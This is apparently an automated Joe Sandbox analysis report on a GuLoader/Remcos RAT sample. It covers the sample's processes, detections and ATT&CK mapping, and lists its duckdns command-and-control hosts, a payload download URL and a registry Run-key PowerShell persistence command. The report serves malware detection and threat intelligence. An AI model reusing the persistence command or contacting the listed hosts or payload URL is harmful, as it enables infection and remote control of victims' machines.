              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-MK0QHYJump to behavior
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Obfuscated Files or Information
              11
              Input Capture
              3
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              PowerShell
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              1
              Software Packing
              LSASS Memory16
              System Information Discovery
              Remote Desktop Protocol11
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              DLL Side-Loading
              Security Account Manager311
              Security Software Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              11
              Masquerading
              NTDS13
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Modify Registry
              LSA Secrets2
              Process Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input Capture213
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526565 Sample: zR4aIjCuRs.exe Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 47 janbours92harbu04.duckdns.org 2->47 49 janbours92harbu03.duckdns.org 2->49 51 2 other IPs or domains 2->51 59 Multi AV Scanner detection for domain / URL 2->59 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 67 6 other signatures 2->67 10 zR4aIjCuRs.exe 18 2->10         started        signatures3 65 Uses dynamic DNS services 49->65 process4 file5 41 C:\Users\user\AppData\...\Falkespors.Var, ASCII 10->41 dropped 75 Suspicious powershell command line found 10->75 14 powershell.exe 28 10->14         started        signatures6 process7 file8 43 C:\Users\user\AppData\...\zR4aIjCuRs.exe, PE32 14->43 dropped 45 C:\Users\...\zR4aIjCuRs.exe:Zone.Identifier, ASCII 14->45 dropped 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->77 79 Writes to foreign memory regions 14->79 81 Tries to detect Any.run 14->81 83 3 other signatures 14->83 18 msiexec.exe 5 9 14->18         started        23 conhost.exe 14->23         started        25 msiexec.exe 14->25         started        27 msiexec.exe 14->27         started        signatures9 process10 dnsIp11 53 janbours92harbu03.duckdns.org 192.169.69.26, 3980, 49769, 49773 WOWUS United States 18->53 55 janbours92harbu04.duckdns.org 45.74.58.7, 3981 VOXILITYGB United States 18->55 57 simonastolerciuc.ro 85.120.16.93, 443, 49768 RCS-RDS73-75DrStaicoviciRO Romania 18->57 39 C:\ProgramData\remcos\logs.dat, data 18->39 dropped 69 Detected Remcos RAT 18->69 71 Tries to detect Any.run 18->71 73 Installs a global keyboard hook 18->73 29 cmd.exe 1 18->29         started        31 WerFault.exe 22 16 18->31         started        33 WerFault.exe 16 18->33         started        file12 signatures13 process14 process15 35 conhost.exe 29->35         started        37 reg.exe 1 1 29->37         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              zR4aIjCuRs.exe79%ReversingLabsWin32.Trojan.GuLoader
              zR4aIjCuRs.exe69%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe79%ReversingLabsWin32.Trojan.GuLoader
              C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe69%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              janbours92harbu04.duckdns.org6%VirustotalBrowse
              simonastolerciuc.ro1%VirustotalBrowse
              janbours92harbu03.duckdns.org9%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://github.com/Pester/Pester40%VirustotalBrowse
              http://pesterbdd.com/images/Pester.png410%VirustotalBrowse
              http://nuget.org/NuGet.exe0%VirustotalBrowse
              http://pesterbdd.com/images/Pester.png9%VirustotalBrowse
              https://simonastolerciuc.ro/images/vnlXriHFWaBU97.bin2%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://aka.ms/pscore6lB0%VirustotalBrowse
              https://contoso.com/License0%VirustotalBrowse
              https://contoso.com/0%VirustotalBrowse
              http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
              https://simonastolerciuc.ro/2%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html40%VirustotalBrowse
              https://nuget.org/nuget.exe0%VirustotalBrowse
              https://contoso.com/Icon0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              janbours92harbu04.duckdns.org
              45.74.58.7
              truetrueunknown
              simonastolerciuc.ro
              85.120.16.93
              truefalseunknown
              janbours92harbu03.duckdns.org
              192.169.69.26
              truetrueunknown
              janbours92harbu007.duckdns.org
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binfalseunknown
                q92harbu03.duckdns.orgtrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://pesterbdd.com/images/Pester.png4powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://github.com/Pester/Pester4powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://simonastolerciuc.ro/Mmsiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binqHmsiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://crl.microsofpowershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://contoso.com/powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binreinsEsrblog.ervadegato.com.br/vnlXriHFWaBU97.bmsiexec.exe, 00000006.00000002.274587858838.00000000224B0000.00000004.00001000.00020000.00000000.sdmpfalse
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.quovadis.bm0powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://nsis.sf.net/NSIS_ErrorErrorzR4aIjCuRs.exe, zR4aIjCuRs.exe.2.drfalseunknown
                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://simonastolerciuc.ro/msiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              85.120.16.93
                              simonastolerciuc.roRomania
                              8708RCS-RDS73-75DrStaicoviciROfalse
                              192.169.69.26
                              janbours92harbu03.duckdns.orgUnited States
                              23033WOWUStrue
                              45.74.58.7
                              janbours92harbu04.duckdns.orgUnited States
                              3223VOXILITYGBtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1526565
                              Start date and time:2024-10-06 11:44:20 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 15m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:zR4aIjCuRs.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@17/23@4/3
                              EGA Information:
                              • Successful, ratio: 33.3%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 92
                              • Number of non-executed functions: 30
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
                              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              05:47:43API Interceptor6x Sleep call for process: msiexec.exe modified
                              11:47:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tragacanth %forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)
                              11:47:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Tragacanth %forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              85.120.16.93Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                • yuya0415.duckdns.org:1928/Vre
                                confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                • servidorarquivos.duckdns.org/e/e
                                oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                • yvtplhuqem.duckdns.org/ja/
                                http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                • fqqqffcydg.duckdns.org/en/
                                http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                • yugdzvsqnf.duckdns.org/en/
                                &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                • servidorarquivos.duckdns.org/e/e
                                transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                • servidorarquivos.duckdns.org/e/e
                                http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                • www.secure-0fflce-o365.duckdns.org/
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                janbours92harbu04.duckdns.orgEnclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.111.244.105
                                file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.111.213.87
                                New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.111.244.109
                                PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.111.244.109
                                Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.111.137.137
                                simonastolerciuc.roEnclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 85.120.16.93
                                janbours92harbu03.duckdns.orgEnclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                OriginalBLShippingDocumentsInvoiceAwbCIPL0000.batGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.111.244.104
                                waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.batGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.111.244.104
                                Bill_Of_Lading_Shipping_Documents_Invoice_Awb_CI_PL000000000000000000000.batGet hashmaliciousRemcos, GuLoaderBrowse
                                • 79.110.49.132
                                Tracking_Invoice_Awb_BL_00340434757340073972.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                • 206.123.148.200
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                VOXILITYGB5s5Ut98vVh.batGet hashmaliciousUnknownBrowse
                                • 172.94.3.25
                                Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                                • 45.74.48.2
                                Dlr7HYI6VL.lnkGet hashmaliciousRemcosBrowse
                                • 172.94.3.25
                                MdkbG2pK4l.lnkGet hashmaliciousRemcosBrowse
                                • 172.94.3.25
                                55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                                • 172.94.3.25
                                zz91Dcv5Kf.dllGet hashmaliciousRemcosBrowse
                                • 172.94.9.207
                                V9HUU0LCin.dllGet hashmaliciousRemcosBrowse
                                • 172.94.9.207
                                E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                                • 172.94.15.211
                                Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                                • 172.94.15.211
                                af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exeGet hashmaliciousNanocore, RemcosBrowse
                                • 104.243.242.162
                                WOWUS755F2BIeBQ.exeGet hashmaliciousRemcosBrowse
                                • 192.169.69.26
                                Rty1HMelBh.exeGet hashmaliciousRemcosBrowse
                                • 192.169.69.26
                                OIQ1ybtQdW.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                • 192.169.69.26
                                Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                https://ipfs.io/ipfs/QmUcxG9XYwfiVnjaf6ugfmt6iPHAdNuk7o3cqDa64AYtKBGet hashmaliciousHTMLPhisherBrowse
                                • 216.176.181.165
                                file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 192.169.69.26
                                RCS-RDS73-75DrStaicoviciROyakov.mips.elfGet hashmaliciousMiraiBrowse
                                • 84.232.192.12
                                novo.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                • 79.117.211.230
                                Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 85.120.16.93
                                GyFcTadTZv.elfGet hashmaliciousMiraiBrowse
                                • 5.14.220.168
                                XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
                                • 86.122.24.142
                                SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                • 188.26.1.21
                                i586.elfGet hashmaliciousUnknownBrowse
                                • 188.27.149.235
                                154.213.187.80-x86-2024-09-01T00_09_56.elfGet hashmaliciousMiraiBrowse
                                • 85.123.99.223
                                firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                • 82.78.55.228
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                37f463bf4616ecd445d4a1937da06e19buildz.exeGet hashmaliciousBabuk, DjvuBrowse
                                • 85.120.16.93
                                InstallSetup.exeGet hashmaliciousStealcBrowse
                                • 85.120.16.93
                                Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 85.120.16.93
                                file.dllGet hashmaliciousMatanbuchusBrowse
                                • 85.120.16.93
                                rpedido-00035.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 85.120.16.93
                                w2TxCv1zA8.msiGet hashmaliciousUnknownBrowse
                                • 85.120.16.93
                                RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                                • 85.120.16.93
                                RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                                • 85.120.16.93
                                Setup.exeGet hashmaliciousUnknownBrowse
                                • 85.120.16.93
                                App_installer32_64x.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                • 85.120.16.93
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.1871363138655737
                                Encrypted:false
                                SSDEEP:192:4AXnW8IMZmPxV2jeTADZGih2nDu76gfAIO84:nm8IMoPxV2je0feDu76gfAIO84
                                MD5:9FE7CC2C0A71EC51CCE19AFA6D616E65
                                SHA1:9C12B87EB514FD5D2C46AE02B9B669CE80BB4D03
                                SHA-256:3ABE4A775DA7B65F8DE48CE9085991FE45E1A603AF580E7F1512D97B109E849E
                                SHA-512:77EB510A7A8DAAF95F1C1F260B2639981B97E2570D7FC89C8AB171D0CABD1287FDE88A1B4418BFC73B5166AED408F13B7C77EB746321B866831D12E2070FC504
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.6.8.1.6.6.6.0.7.7.8.6.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.6.8.1.6.6.6.4.5.2.7.7.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.d.1.4.e.1.7.-.1.2.0.2.-.4.2.d.6.-.a.d.c.8.-.8.c.1.9.8.5.0.9.b.0.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.9.1.6.f.a.2.-.4.7.7.c.-.4.6.2.d.-.a.9.2.4.-.4.1.3.d.8.e.4.7.6.4.1.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.f.0.-.0.0.0.1.-.0.0.4.d.-.7.2.a.e.-.4.a.a.d.d.4.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.d.0.c.7.c.f.c.a.8.1.0.4.d.0.6.d.e.1.f.0.8.b.9.7.f.2.8.b.3.5.2.0.c.2.4.6.c.d.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.1867453190313875
                                Encrypted:false
                                SSDEEP:192:LGXnW8IM9maQHY7hjeTADZGih2nDu76rfAIO84:im8IMsaQHY7hje0feDu76rfAIO84
                                MD5:B3FAB23E32E89DA13A581C68F5A5FCD6
                                SHA1:6D15A5A17F7EA6C10559E97A33F25D2840360A94
                                SHA-256:B431C3F4B9830723E202449FA5F0A2DD90819F21521D64E708E664210CD7F514
